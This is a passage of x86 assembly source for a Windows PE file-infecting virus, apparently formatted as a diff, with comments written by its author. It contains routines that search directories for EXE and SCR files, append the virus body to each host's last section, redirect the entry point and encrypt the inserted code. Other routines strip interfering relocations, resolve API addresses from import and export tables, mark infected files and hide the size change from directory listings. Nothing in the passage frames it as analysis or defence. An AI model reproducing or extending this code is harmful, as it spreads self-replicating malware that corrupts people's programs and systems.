esi,edi +ansiok: xchg ecx,eax + cld + ret + +Rva2Raw proc ;this function converts RVA valuez to RAW pointerz inside PE + ; filez. This function is specialy useful for memory-maped + ; filez. + ;given a RVA value, this function returns the start adress + ; and size of the section containin it, plus its relative + ; delta value inside the section. + ;on entry: + ; EAX = RVA value + ; EBP = start of memory-maped file (MZ header) + ; ESI = start of PE header + 3Ch + ;on exit: + ; EBP = RAW size of section + ; EBX = RAW start of section + ; ECX = 0, if not found + ; start of respective section header (+ section header + ; size), if found + ; EDX = RVA start of section + ; ESI = relative delta of RVA value inside section. + + movzx ecx,word ptr [esi.NT_FileHeader \ ;get number of sectionz + .FH_NumberOfSections \ + -MZ_lfanew] + jecxz end_Rva2Raw + movzx ebx,word ptr [esi.NT_FileHeader \ ;get first section header + .FH_SizeOfOptionalHeader \ + -MZ_lfanew] + lea ebx,[esi.NT_OptionalHeader + ebx - MZ_lfanew] + x = IMAGE_SIZEOF_SECTION_HEADER + +match_virtual: ;scan each PE section header and determine if specified RVA + ;value points inside + + mov esi,eax + mov edx,[ebx.SH_VirtualAddress] + sub esi,edx + sub ebx,-x + cmp esi,[ebx.SH_VirtualSize - x] ;is RVA value pointin inside current section? + jb section_found ;yea we found the section, jump + loop match_virtual ;nope, get next section + +end_Rva2Raw: + + ret + +Rva2Raw endp + +get_handle_ofs_ebp: ;this function sets EBP register to reference internal + ; variablez correctly and also given a handle, it gets + ; a pointer to an entry in the handlez table. + ;this function is only useful at the resident stage. + ;on entry: + ; TOS+28h (Pshd.cPushad.Arg1): specified handle + ;on exit: + ; EDI = pointer to entry in handlez table + ; Carry clear, if ok + ; Carry set, if error + + xchg ecx,eax + jecxz end_gho_stc + call get_ebp2 + mov ecx,[esp.(Pshd).cPushad.Arg1] ;get handle + jecxz end_gho_stc + xchg eax,ecx + cmp ax,? + org $ - 2 + +get_handle_ofs_0: ;gets a pointer to an empty entry in the handlez table + ;this function is only useful at the resident stage. + ;on exit: + ; EDI = pointer to entry in handlez table + ; Carry clear, if ok + ; Carry set, if error + + sub eax,eax + +get_handle_ofs: ;given a handle, this function gets a pointer + ; to an entry in the handlez table. + ;this function is only useful at the resident stage. + ;on entry: + ; EAX = specified handle + ;on exit: + ; EDI = pointer to entry in handlez table + ; Carry clear, if ok + ; Carry set, if error + + lea edi,[ebp + Handlez - 8 - ebp_num] + lea edx,[edi + nHANDLEZ] + next_gho: scasd ;add edi,8 + scasd ; + cmp edx,edi ;top of handlez table reached? + jc end_gho ;yea, handle not found, jump + cmp eax,[edi] ;do handlez match? + jnz next_gho ;no, check next handle, jump + test al,? ;yea, handle found, clear carry + org $ - 1 + end_gho_stc: stc ;set carry + end_gho: ret + +section_found: + + x = IMAGE_SIZEOF_SECTION_HEADER + xchg ebp,ebx + add ebx,[ebp.SH_PointerToRawData - x] ;get RAW start of section + xchg ecx,ebp + mov ebp,[ecx.SH_SizeOfRawData - x] ;get RAW size of section + cld + ret + +get_relocs: ;this comon funtion is called from both instalation and + ; infection stage. + ;it simply locates each relocation block in the .reloc section + ; and calls a function to (a) nulify those dangerous reloca- + ; tionz in a block (infection stage) or (b) to fix the code + ; pointed to by such marked relocationz (instalation stage). + ;on entry: + ; EDI = RVA start pointer to chunk of code + ; TOS+04h (Arg1): fix_relocs label function adress (instalation stage) + ; or + ; nul_relocs label function adress (infection stage) + ; TOS+00h (return adress) + + add esi,ebx ;get start of relocation section in aplication context + add edx,edi ;get end adress of chunk code + lea ebp,[ecx+esi] ;get end of relocation section in aplication context + +process_reloc_blocks: + + lodsd + xchg ebx,eax ;get start RVA for this block of relocationz + lea ecx,[ebx + 4096] ;get end RVA where relocationz can point in a block + lodsd ;get size of reloc block + x = IMAGE_SIZEOF_BASE_RELOCATION + add eax,-x + cmp edi,ecx ;RVA pointer inside relocation block? (check low boundary) + lea ecx,[eax + esi] ;get next block adress + push ecx + jnc next_reloc_block + shr eax,1 + cmp ebx,edx ;RVA pointer inside relocation block? (check high boundary) + jnc next_reloc_block + xchg ecx,eax ;get number of relocationz for this block + jecxz next_reloc_block + + call [esp.(Pshd).Arg1] ;call fix_relocs function or nul_relocs function + +next_reloc_block: + + pop esi ;get next block adress + lea eax,[esi + x] + cmp eax,ebp ;end of relocation blockz? + jc process_reloc_blocks ;no, process the block, jump + ret (Pshd) ;yea, no more relocation blockz, return + +Process_File3: ;this function copies a filename to an internal buffer + ; and checks the extension thru a list of infectable + ; extensions (EXE and SCR filez for the moment). If + ; the extension matches, the file will be infected. + @copysz + mov edx,not 0FF202020h ;upercase mask + mov ecx,[edi-4] ;get filename extension + lea esi,[ebp + Exts - ebp_num] ;get pointer to list of extensionz + and ecx,edx ;convert file extension to upercase + +next_ext: + + lodsd ;get extension from list + dec al ;no more extensionz? + js end_PF3 + and eax,edx ;convert extension to upercase + dec esi + xor eax,ecx ;do extensionz match? + jnz next_ext + cmp byte ptr [edi-5],'.' + jnz end_PF3 ;no, get next extension + call Process_File2 ;yes, extensionz match, infect file + +end_PF3: ret + +err_Rva2Raw: + + popad ;needed to unwind the stack from some function + +err_Rva2Raw2: + + popad ;needed to unwind the stack from some function + ret + +Attach proc ;attach virus code to last section in the PE file and + ; change section characteristicz to reflect infection. + ;on entry: + ; ECX = base of memory-maped file + ; EDI = original file size + ;on exit: + ; EDI = new file size + + lea esi,[ecx.MZ_lfanew] ;get base of PE header + 3Ch + mov eax,[ebp + pcode_start - ebp_num] ;get start adress of virus code + add esi,[esi] + mov edx,[esi.NT_OptionalHeader \ ;get built-in image base + .OH_ImageBase \ + -MZ_lfanew] + pushad ;save valuez to stack + xor eax,eax + x = IMAGE_SIZEOF_SECTION_HEADER + sub al,-x + mul byte ptr [esi.NT_FileHeader \ ;get number of sectionz + .FH_NumberOfSections \ + -MZ_lfanew] + add ax,word ptr [esi.NT_FileHeader \ ;get first section header + .FH_SizeOfOptionalHeader \ + -MZ_lfanew] + jc err_Rva2Raw2 + lea ebx,[esi.NT_OptionalHeader - MZ_lfanew + eax] + mov eax,[esi.NT_OptionalHeader.OH_SectionAlignment - MZ_lfanew] + mov edx,[esi.NT_OptionalHeader.OH_FileAlignment - MZ_lfanew] + dec eax + dec edx + or eax,edx ;check SectionAlignment and FileAlignment fieldz + cmp eax,10000h + jnc err_Rva2Raw2 ;too large? + add edi,ecx ;get end of file in MM-file + inc al + jnz err_Rva2Raw2 + mov eax,[ebx.SH_VirtualAddress - x] + mov ebp,ecx ;get MM-file base address + add eax,edi + add ecx,[ebx.SH_PointerToRawData - x] + sub eax,ecx ;get new RVA entry point + +;at this point: +; +; cPushad.EAX = source adress of code to copy (start at encrypted stringz) +; cPushad.EBX = embedded (in PE header) host base address +; EBP = start of MM-file. Base address of MM-file +; EAX = new RVA entry point (start of virus code RVA) +; EDX = file alignment - 1 +; EDI = target adress where code will be copied to in the MM-File +; ECX = start adress of last section in the MM-file +; EBX = start adress of last section header (plus section header size) +; in the MM-file +; ESI = start of PE header (+ 3Ch) in the MM-file + + pushad + mov eax,[esi.NT_OptionalHeader \ ;get current entry point + .OH_AddressOfEntryPoint \ + -MZ_lfanew] + +;on entry: +; +; EAX = Host EntryPoint RVA +; EBP = start of MZ header (start of MM-file) +; ESI = start of PE header + 3Ch (in MM-file) + + call Rva2Raw ;find true code section (clue: EntryPoint RVA points inside) + +;on exit: +; +; EBP = raw size of CODE section +; EBX = raw start of CODE section +; ECX = 0, if not found +; start of CODE section header (+ section header size), if found +; EDX = start of CODE section RVA +; ESI = relative delta of RVA inside CODE section. + + jecxz err_Rva2Raw ;code section not found, invalid EntryPoint + pushad + mov ebp,esp + mov edx,[ebp.(2*cPushad).Pushad_ebp] ;get original ebp + x = IMAGE_SIZEOF_SECTION_HEADER + or byte ptr [ecx.SH_Characteristics.hiw.hib - x],20h ;set exec bit to section + +exec_set: + + mov esi,[edx + ImportHdr - ebp_num] ;get import section header + xor ecx,esi ;is import table inside code section? + jz IT_in_Code ;yea, jump + + ;import table NOT inside code section (i.e. probably exists an .idata section) + + or byte ptr [esi.SH_Characteristics.hiw.hib - x],80h ;set writable bit + +IT_in_Code: ;import table is inside code section (stupid microsoft) + ;no need to set the writable bit (the exec bit does the job) + + sub ecx,ecx + push edi ;need this value l8r, push it + mov cl,5 + sub eax,0B2FD26A3h +sub_1st_val = dword ptr $ - 4 + add edi,ecx ;add edi,5 + stosd + push edi + mov eax,ecx ;ax = 5 + stosw + sub al,- 0e9h + 5 ;al = E9h + stosb + mov eax,[ebp.cPushad.Pushad_eax] ;get RVA start of virus code + sub eax,[ebp.Pushad_eax] + sub eax,ecx ;sub eax,5 + stosd + xor eax,eax + pop esi + stosw ;0 + mov edi,[ebp.Pushad_eax] + +nulify_relocs: ;nulify relocs that could overwrite our inserted chunks of code.. + + push edi + lodsw + cwde + pushad + mov esi,[ebp.cPushad.Pushad_esi] ;get PE header (+ 3Ch) + mov ecx,[esi.NT_OptionalHeader \ ;get size of relocation blockz + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_Size \ + -MZ_lfanew] + jecxz go_popad ;no relocationz, jump + push eax ;save size of this chunk of code temporarily + push ecx + mov ebp,[ebp.cPushad.Pushad_ebp] ;get base of MM-file (MZ header) + mov eax,[esi.NT_OptionalHeader \ ;get RVA start of relocation blockz + .OH_DirectoryEntries \ + .DE_BaseReloc \ + .DD_VirtualAddress \ + -MZ_lfanew] + call Rva2Raw ;convert RVA to a raw offset inside the section + pop eax + pop edx ;retrieve size of this chunk of code temporarily + jecxz go_popad + xchg ecx,eax + call mark_reloc ;pass nul_relocs as a parameter to get_relocs function + +nul_relocs: + + lodsw ;get relocation item + cwde + ror eax,3*4 + add al,- IMAGE_REL_BASED_HIGHLOW ;check relocation type + jnz n_next_reloc ;not valid, get next relocation item + shr eax,5*4 ;strip or blank relocation type field from relocation item + lea eax,[eax + ebx + 4] ;convert relocation pointer to RVA + cmp edi,eax ;check if relocation points to our chunk of code.. + jnc n_next_reloc ;check low boundary + add eax,-4 + cmp eax,edx ;check high boundary + jnc n_next_reloc ;it doesnt point to our chunk of code, get next relocation item + + ;this relocation item is pointing inside our chunk of code.. + ;nulify and mark it! + + and byte ptr [esi.hib - 2],not (mask RD_RelocType shr 8) ;nulify relocation! + +n_next_reloc: + + loop nul_relocs ;get next relocation item + ret + +mark_reloc: + + call get_relocs + +go_popad: + + popad + xchg ecx,eax ;size of this chunk of code + add edi,[ebp.Pushad_ebx] ;convert RVA start of chunk of code to a raw value + sub edi,[ebp.Pushad_edx] + +pre_crypt: + + lodsb ;encrypt chunk of code.. + xchg [edi],al + ror al,cl + inc edi + xor al,06Ah +_xor_2nd_val = byte ptr $ - 1 + mov [esi-1],al + loop pre_crypt + lodsw ;get next chunk of code + cwde + pop edi + xchg ecx,eax ;no more chunkz? + jecxz pre_crypt_done + sub edi,ecx ;point EDI to next chunk + jmp nulify_relocs ;check relocationz, jump + +pre_crypt_done: + + sub al,-0e8h ;build 'call' instruction + pop edi + stosb + lea eax,[eax + get_base - code_start - 4 - 0e8h + esi] ; + sub eax,edi + stosd + mov cx,(v_end - code_start + 3)/4 + add eax,edi + mov edi,[ebp.cPushad.cPushad.Pushad_eax] ;get start of virus code + mov edx,[ebp.cPushad.cPushad.Pushad_edx] ;get embedded base + xchg esi,edi + rep movsd ;copy virus code + sub ecx,[ebp.cPushad.Pushad_eax] + mov [ebp.cPushad.Pushad_edi],edi + add ecx,-5 + mov [eax + old_base - get_base],edx ;hardcode some valuez.. + mov [eax + delta_host - get_base],ecx + popad + popad + + x = IMAGE_SIZEOF_SECTION_HEADER + + sub edi,ecx ;change characteristicz of last section in the PE header.. + lea ecx,[edx + edi] + xchg edx,eax + inc eax + cdq ;edx=0 + xchg ecx,eax + div ecx ;calculate new size of last section + mul ecx + xchg eax,edi + mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment - MZ_lfanew] + sub eax,v_end - virtual_end + cmp [ebx.SH_VirtualSize - x],eax ;calculate new virtual size of last section + jnc n_vir + mov [ebx.SH_VirtualSize - x],eax + n_vir: dec eax + mov [ebx.SH_SizeOfRawData - x],edi ;update size of last section + add eax,ecx + div ecx + mul ecx + pop ebp ;get original file size + add eax,[ebx.SH_VirtualAddress - x] + cmp [esi.NT_OptionalHeader.OH_SizeOfImage - MZ_lfanew],eax ;update size of image field in the PE header + jnc n_img + mov [esi.NT_OptionalHeader.OH_SizeOfImage - MZ_lfanew],eax + n_img: add edi,[ebx.SH_PointerToRawData - x] + sub ecx,ecx + or byte ptr [ebx.SH_Characteristics.hiw.hib - x],0C0h ;change section flagz + push ebp + mov eax,[esi.NT_OptionalHeader.OH_CheckSum - MZ_lfanew] ;calculate special checksum to mark infected filez + xor ebp,eax + add al,-2Dh + xor ebp,0B2FD26A3h xor 0D4000000h + not al + xor al,ah + shl ebp,6 + xor al,byte ptr [esi.NT_OptionalHeader.OH_CheckSum.hiw - MZ_lfanew] + shr al,2 + shld eax,ebp,3*8+2 + mov [esi.NT_FileHeader.FH_TimeDateStamp - MZ_lfanew],eax ;store checksum value + pop eax ;get original file size + mov cl,65h + cmp eax,edi ;calculate new file size.. + .if carry? + xchg edi,eax + .endif + sub eax,1 - 65h + div ecx + mul ecx ;use size paddin.. + push eax + +end_Attach: + + popad + +needed_ret: + + ret + +Attach endp + +Process_Dir: ;this function receives a pointer to an asciiz string + ; containin a path, then it searches filez with an extension + ; matchin the list of extensionz, and finaly infects them. + ;on entry: + ; EDI = pointer to pathname + ; EAX = size of pathname + + dec eax + cmp eax,7Fh + jnc needed_ret ;if pathname greater than 7Fh characterz, jump + pushad + mov esi,edi + adc edi,eax + cld + mov al,'\' ;add '\' to the pathname if not included + cmp [edi-1],al + jz Find_Filez + stosb + +Find_Filez: ;find filez in the specified pathname.. + + push edi + sub eax,'\' - '*.*' + stosd + call findfirst ;find each file "*.*" in the path + pop edi + jz end_Attach ;if error, jump + dec eax + push eax ;save search handle + +Process_File: ;a file was found, process it + + push edi + lea esi,[ebx.WFD_szFileName] ;get filename + call Process_File3 ;process file, infect it + +Find_Next: + + pop edi + pop eax + push eax + push ebx + push eax + call [ebp + ddFindNextFileA - ebp_num] ;find next file + test eax,eax ;more filez? + jnz Process_File ;yea, process it, jump + +Find_Close: + + call [ebp + ddFindClose - ebp_num] ;close search + +end_Find: + +end_Process_Dir: + + popad + ret + +APICall@n_2: mov cl,2 ;call an API and pass two parameterz + +APICall@n proc ;this function calls an API and passes "n" parameterz + ; as argumentz + ;on entry: + ; EAX = API function adress + ; ECX = number of paremeterz + + pushfd + movzx edx,cl + mov ecx,edx + push_args: push dword ptr [esp.(2*Pshd) + 4*edx] ;push parameter + loop push_args + call eax ;call API + popfd + ret +APICall@n endp + +IGetProcAddressIT: + + pop edx + push eax + lea eax,[ebp + vszKernel32 - ebp_num] + push eax + push edx + +GetProcAddressIT proc ;gets a pointer to an API function from the Import Table + ; (the object inspected is in raw form, i.e. memory-maped) + ;on entry: + ; TOS+08h (Arg2): API function name + ; TOS+04h (Arg1): module name + ; TOS+00h (return adress) + ;on exit: + ; EAX = RVA pointer to IAT entry + ; EAX = 0, if not found + + pushad + + lea esi,[ecx.MZ_lfanew] + mov ebp,ecx ;get KERNEL32 module handle + add esi,[esi] ;get address of PE header + MZ_lfanew + mov ecx,[esi.NT_OptionalHeader \ ;get size of import directory + .OH_DirectoryEntries \ + .DE_Import \ + .DD_Size \ + -MZ_lfanew] + jecxz End_GetProcAddressIT2 ;if size is zero, no API imported! + mov eax,[esi.NT_OptionalHeader \ ;get address of Import directory + .OH_DirectoryEntries \ + .DE_Import \ + .DD_VirtualAddress \ + -MZ_lfanew] + call Rva2Raw ;find size and raw start of import section + jecxz End_GetProcAddressIT + push esi + mov eax,[esp.(Pshd).Pushad_ebp] + mov [eax + ImportHdr - ebp_num],ecx ;save raw adress of import section header for l8r use + x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR + +Get_DLL_Name: ;scan each import descriptor inside import section to match module name specified + + pop esi ;diference (if any) between start of import table and start of import section + mov ecx,[ebx.esi.ID_Name] ;get RVA pointer to imported module name + +End_GetProcAddressIT2: + + jecxz End_GetProcAddressIT ;end of import descriptorz? + sub ecx,edx ;convert RVA pointer to RAW + cmp ecx,ebp ;check if it points inside section + jae End_GetProcAddressIT + sub esi,-x + push esi ;save next import descriptor for later retrieval + lea esi,[ebx + ecx] + mov edi,[esp.(Pshd).cPushad.Arg1] ;get module name specified from Arg1 + +Next_char_from_DLL: ;do a char by char comparison with module name found inside seccion + ;stop when a NULL or a dot '.' is found + lodsb + add al,-'.' + jz IT_nup ;its a dot + sub al,-'.'+'a' + cmp al, 'z'-'a'+ 1 + jae no_up + add al,-20h ;convert to upercase + no_up: sub al,-'a' +IT_nup: scasb + jnz Get_DLL_Name ;namez dont match, get next import descriptor + cmp byte ptr [edi-1],0 + jnz Next_char_from_DLL + +Found_DLL_name: ;we got the import descriptor containin specified module name + + pop esi + lea eax,[edx + esi.ID_ForwarderChain - x] + add esi,ebx + mov [esp.Pushad_edx],eax ;store pointer to ForwarderChain field for later use + mov [esp.Pushad_esi],esi ;store pointer to import descriptor for later use + push dword ptr [esp.cPushad.Arg2] + mov eax,[esp.(Pshd).Pushad_ebp] + push dword ptr [eax + K32Mod - ebp_num] + call GetProcAddressET ;scan export table of specified module handle + xchg eax,ecx ;and get function adress of specified API + mov ecx,[esi.ID_FirstThunk - x] ;This is needed just in case the API function adressez are bound in the IAT + jecxz End_GetProcAddressIT ;if not found then go, this value cant be zero or the IAT wont be patched + push eax + call GetProcAddrIAT ;inspect first thunk (which later will be patched by the loader) + test eax,eax + jnz IAT_found ;if found then jump (save it and go) + mov ecx,[esi.ID_OriginalFirstThunk - x] ;get original thunk (which later will hold the original unpatched IAT) + jecxz End_GetProcAddressIT ;if not found then go, this value could be zero + push eax + call GetProcAddrIAT ;inspect original thunk + test eax,eax + jz IAT_found ;jump if not found + sub eax,ecx ;we got the pointer + add eax,[esi.ID_FirstThunk - x] ;convert it to RVA + db 6Bh,33h,0C0h ;imul esi,[ebx],-0C0h ;i like bizarre thingz =8P + org $ - 2 + +End_GetProcAddressIT: + + db 33h,0C0h ;xor eax,eax ;error, adress not found + +IAT_found: + + mov [esp.Pushad_eax],eax ;save IAT entry pointer + popad + ret (2*Pshd) ;jump and unwind parameterz in stack + +findfirst: ;this function is just a wraper to the FindFistFileA API.. + + lea ebx,[ebp + FindData - ebp_num] + push ebx ;args for findfirst + push esi ;args for findfirst + call [ebp + ddFindFirstFileA - ebp_num] ;call FindFirstFileA API + +end_findfirst: + + inc eax + cld + ret + +get_size: ;this function retrieves the file size and discards + ; huge filez, it also sets some parameterz for l8r use + ;on entry: + ; EBX = pointer to WIN32_FIND_DATA structure + ;on exit: + ; EAX = file size + ; ESI = pointer to filename + ; Carry clear: file ok + ; Carry set: file too large + + xor ecx,ecx + test byte ptr [ebx.WFD_dwFileAttributes],FILE_ATTRIBUTE_DIRECTORY + jnz get_size_ret ;discard directory entriez + mov edx,ecx + cmp [ebx.WFD_nFileSizeHigh],edx ;discard huge filez, well if any thaat big (>4GB) + mov cl,65h ;load size padin value + lea esi,[ebp + PathName - ebp_num] ;get pointer to filename + mov eax,[ebx.WFD_nFileSizeLow] ;get file size + +get_size_ret: + + ret + +GetProcAddrIAT: ;this function scans the IMAGE_THUNK_DATA array of "dwords" + ; from the selected IMAGE_IMPORT_DESCRIPTOR, searchin for + ; the selected API name. This function works for both + ; bound and unbound import descriptorz. This function is + ; called from inside GetProcAddressIT. + ;on entry: + ; EBX = RAW start pointer of import section + ; ECX = RVA pointer to IMAGE_THUNK_ARRAY + ; EDX = RVA start pointer of import section + ; EDI = pointer selected API function name. + ; EBP = RAW size of import section + ; TOS+04h (Arg1): real address of API function inside selected + ; module (in case the descriptor is unbound). + ; TOS+00h (return adress) + ;on exit: + ; EAX = RVA pointer to IAT entry + ; EAX = 0, if not found + + push ecx + push esi + sub ecx,edx + xor eax,eax + cmp ecx,ebp + jae IT_not_found + lea esi,[ebx + ecx] ;get RAW pointer to IMAGE_THUNK_DATA array + +next_thunk_dword: + + lodsd ;get dword value + test eax,eax ;end of IMAGE_THUNK_DATA array? + jz IT_not_found + +no_ordinal: + + sub eax,edx ;convert dword to a RAW pointer + cmp eax,ebp ;dword belongs to an unbound image descriptor? + jb IT_search ;no, jump + add eax,edx ;yea, we have the API adress itself, reconvert to RVA + cmp eax,[esp.(2*Pshd).Arg1] ;API adressez match? + jmp IT_found? ;yea, we found it, jump + +IT_search: + + push esi ;image descriptor contains imports by name + lea esi,[ebx+eax.IBN_Name] ;get API name from import descriptor + mov edi,[esp.(5*Pshd).cPushad.Arg2] ;get API name selected as a parameter + +IT_next_char: ;find requested API from all imported API namez.. + + cmpsb ;do APIz match? + jnz IT_new_search ;no, continue searchin + +IT_Matched_char: + + cmp byte ptr [esi-1],0 + jnz IT_next_char + +IT_new_search: + + pop esi ;yea, they match, we found it + +IT_found?: + + jnz next_thunk_dword + lea eax,[edx+esi-4] ;get the pointer to the new IAT entry + sub eax,ebx ;convert it to RVA + +IT_not_found: + + pop esi + pop ecx + ret (Pshd) + +GetProcAddressIT ENDP + +check_PE_file: ;this function opens, memory-maps a file and checks + ; if its a PE file + ;on entry: + ; EBX = pointer to WIN32_FIND_DATA structure + ; ESI = pointer to filename + ;on exit: + ; ESI = 0, file already infected or not infectable + ; ESI != 0, file not infected + + call Open&MapFile ;open and memory-map the file + jecxz end_PE_file + mov eax,[ebx.WFD_nFileSizeLow] ;get file size + add eax,-80h + jnc Close_File ;file too short? + +Check_PE_sign: ;this function checks validity of a PE file. + ;on entry: + ; ECX = base address of memory-maped file + ; EBX = pointer to WIN32_FIND_DATA structure + ; EAX = host file size - 80h + ;on exit: + ; ESI = 0, file already infected or not infectable + ; ESI != 0, file not infected + + cmp word ptr [ecx],IMAGE_DOS_SIGNATURE ;needs MZ signature + jnz Close_File + mov edi,[ecx.MZ_lfanew] ;get ptr to new exe format + cmp eax,edi ;ptr out of range? + jb Close_File + add edi,ecx + cmp dword ptr [edi],IMAGE_NT_SIGNATURE ;check PE signature + jnz Close_File + cmp word ptr [edi.NT_FileHeader.FH_Machine], \ ;must be 386+ machine + IMAGE_FILE_MACHINE_I386 + jnz Close_File + mov eax,dword ptr [edi.NT_FileHeader.FH_Characteristics] + not al + test ax,IMAGE_FILE_EXECUTABLE_IMAGE or \ ;must have the executable bit but cant be a DLL + IMAGE_FILE_DLL + jnz Close_File + + ;at this point, calculate virus checksum to make sure file is really + ;infected. If its infected then return original size of host previous + ;to infection and store it in the WIN32_FIND_DATA structure (stealth). + + mov eax,[edi.NT_OptionalHeader.OH_CheckSum] ;get checksum field + push eax + sub al,2Dh ;calculate virus checksum to make sure file is really infected + xor ah,al + mov al,[edi.NT_FileHeader.FH_TimeDateStamp.hiw.hib] + xor ah,byte ptr [edi.NT_OptionalHeader.OH_CheckSum.hiw] + and al,11111100b + xor ah,al + mov [ebp + uni_or_ansi - ebp_num],ah + inc ah + pop eax + jnz go_esi + xor eax,0B2FD26A3h xor 68000000h + xor eax,[edi.NT_FileHeader.FH_TimeDateStamp] + and eax,03FFFFFFh + cmp eax,[ebx.WFD_nFileSizeLow] + jnc go_esi + mov [ebx.WFD_nFileSizeLow],eax ;return original file size +go_esi: inc esi ;set "already infected" mark + +Close_File: + + call Close&UnmapFile ;close and unmaps file + +end_PE_file: + + dec esi + ret + +pop_ebp: ;get the ebp_num value needed to access variablez thru EBP + pop ebp + if (ebp_num - m_ebp) + lea ebp,[ebp + ebp_num - m_ebp] + endif + mov [ebp + uni_or_ansi - ebp_num],al + cld + +another_ret: + + ret + +Process_File2: ;this function checks the file size, retrieves some key API + ; adressez from inside the import table and infects the file. + ;on entry: + ; EBX = pointer to WIN32_FIND_DATA structure + ; ESI = pointer to filename + + call get_size + jnz another_ret ;if file size too short, jump + cmp eax,4000000h - 10*1024 + jnc another_ret ;if file size too large (>64MB), jump + div ecx ;check infection thru size paddin + dec edx + js another_ret ;already infected, jump + call check_PE_file ;open file, check PE signature and close file + jnz another_ret ;not valid PE file, jump + inc byte ptr [ebp + uni_or_ansi - ebp_num] ;double-check file + jz another_ret ;discard if infected + +Bless: ;this function prepares the host file for infection: blank file + ; atributez, open and map file in r/w mode, retrieves RVA pointerz + ; to GetModuleHandleA, GetModuleHandleW and GetProcAddress, call + ; the "Attach" function to infect the file and finaly restore + ; date/time stamp and attributez + + push esi + lea esi,[ebp + PathName - ebp_num] ;get pointer to filename + push esi + call [ebp + ddSetFileAttributesA - ebp_num] ;blank file atributez + xchg ecx,eax + jecxz another_ret ;if error, jump, if disk is write-protected for example + push esi + mov edi,virtual_end - code_start ;calculate buffer size needed for infection + add edi,[ebx.WFD_nFileSizeLow] ;add to original size + call Open&MapFileAdj ;open and map file in read/write mode + jecxz end_Bless2 ;if any error, if file is locked for example, jump + + lea eax,[ebp + vszGetModuleHandleA - ebp_num] + call IGetProcAddressIT ;get RVA pointer to GetModuleHandleA API in the import table + test esi,esi + jz end_Bless3 ;if KERNEL32 import descriptor not found, dont infect + + x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR + + mov [ebp + ptrForwarderChain - ebp_num],edx ;store RVA pointer to ForwarderChain field from KERNEL32 import descriptor + mov edx,[esi.ID_ForwarderChain - x] + mov [ebp + ddGetModuleHandleA - ebp_num],eax ;store RVA pointer to GetModuleHandleA API + mov [ebp + ddForwarderChain - ebp_num],edx ;store actual ForwarderChain field value from KERNEL32 import descriptor + cdq ;edx=0 + dec eax ;if RVA pointer to GetModuleHandleA found, jump and store null for GetModulehandleW RVA pointer (not needed) + jns StoreHandleW + lea eax,[ebp + vszGetModuleHandleW - ebp_num] + call IGetProcAddressIT ;get RVA pointer to GetProcAddress API in the import table + xchg eax,edx + test edx,edx ;if found, jump and store GetModuleHandleW RVA pointer + jnz StoreHandleW + + cmp [esi.ID_TimeDateStamp - x],edx ;shit, not found, now check if KERNEL32 API adressez are binded + jz StoreHandleW + cmp edx,[esi.ID_OriginalFirstThunk - x] + jz end_Bless3 + mov [esi.ID_TimeDateStamp - x],edx + +StoreHandleW: + + mov [ebp + ddGetModuleHandleW - ebp_num],edx ;store RVA pointer to GetModuleHandleW API + lea eax,[ebp + vszGetProcAddress - ebp_num] + call IGetProcAddressIT ;get RVA pointer to GetModuleHandleA API in the import table + mov [ebp + ddGetProcAddress - ebp_num],eax ;store RVA pointer to GetModuleHandleW API if found, store zero if not found anywayz + + call Attach ;infect file + ;at this point: + ; ECX = host base adress, start of memory-maped file + ; EDI = original file size + +end_Bless3: + + call Close&UnmapFileAdj ;close, unmap file and restore other setingz if necesary + +end_Bless2: + + pop esi ;get pointer to filename + mov ecx,[ebx.WFD_dwFileAttributes] ;get original file atributez + jecxz end_Bless1 + push ecx + push esi + call [ebp + ddSetFileAttributesA - ebp_num] ;restore original file atributez + +end_Bless1: + +end_Process_File2: + + ret + +GetProcAddressET proc ;This function is similar to GetProcAddressIT except + ; that it looks for API functions in the export table + ; of a given DLL module. It has the same functionality + ; as the original GetProcAddress API exported from + ; KERNEL32 except that it is able to find API + ; functions exported by ordinal from KERNEL32. + ;on entry: + ; TOS+08h (Arg2): pszAPIname (pointer to API name) + ; TOS+04h (Arg1): module handle/base address of module + ; TOS+00h (return adress) + ;on exit: + ; ECX = API function address + ; ECX = 0, if not found + + pushad + @SEH_SetupFrame + mov eax,[esp.(2*Pshd).cPushad.Arg1] ;get Module Handle from Arg1 + mov ebx,eax + add eax,[eax.MZ_lfanew] ;get address of PE header + mov ecx,[eax.NT_OptionalHeader \ ;get size of Export directory + .OH_DirectoryEntries \ + .DE_Export \ + .DD_Size] + jecxz Proc_Address_not_found ;size is zero, no API exported + mov ebp,ebx ;get address of Export directory + add ebp,[eax.NT_OptionalHeader \ + .OH_DirectoryEntries \ + .DE_Export \ + .DD_VirtualAddress] +ifdef Ordinal + mov eax,[esp.(2*Pshd).cPushad.Arg2] ;get address of requested API from Arg2 + test eax,-10000h ;check if Arg2 is an ordinal + jz Its_API_ordinal +endif + +Its_API_name: + + push ecx + mov edx,ebx ;get address of exported API namez + add edx,[ebp.ED_AddressOfNames] + mov ecx,[ebp.ED_NumberOfNames] ;get number of exported API namez + xor eax,eax + cld + +Search_for_API_name: + + mov esi,ebx ;get address of next exported API name + add esi,[edx+eax*4] + mov edi,[esp.(3*Pshd).cPushad.Arg2] ;get address of requested API name from Arg2 + +Next_Char_in_API_name: + + cmpsb ;find requested API from all exported API namez + jz Matched_char_in_API_name + inc eax + loop Search_for_API_name + pop eax + +Proc_Address_not_found: + + xor eax,eax ;API not found + jmp End_GetProcAddressET + +ifdef Ordinal + +Its_API_ordinal: + + sub eax,[ebp.ED_BaseOrdinal] ;normalize Ordinal, i.e. convert it to an index + jmp Check_Index +endif + +Matched_char_in_API_name: + + cmp byte ptr [esi-1],0 ;end of API name reached ? + jnz Next_Char_in_API_name + pop ecx + mov edx,ebx ;get address of exported API ordinalz + add edx,[ebp.ED_AddressOfOrdinals] + movzx eax,word ptr [edx+eax*2] ;get index into exported API functionz + +Check_Index: + + cmp eax,[ebp.ED_NumberOfFunctions] ;check for out of range index + jae Proc_Address_not_found + mov edx,ebx ;get address of exported API functionz + add edx,[ebp.ED_AddressOfFunctions] + add ebx,[edx+eax*4] ;get address of requested API function + mov eax,ebx + sub ebx,ebp ;take care of forwarded API functionz + cmp ebx,ecx + jb Proc_Address_not_found + +End_GetProcAddressET: + + mov [esp.(2*Pshd).Pushad_ecx],eax ;set requested Proc Address, if found + @SEH_RemoveFrame + popad + jmp Ret2Pshd + +GetProcAddressET endp + +goto_GetProcAddressET: + + jmp GetProcAddressET + +MyGetProcAddressK32: ;this function is simply a wraper to the GetProcAddress + ; API. It retrieves the address 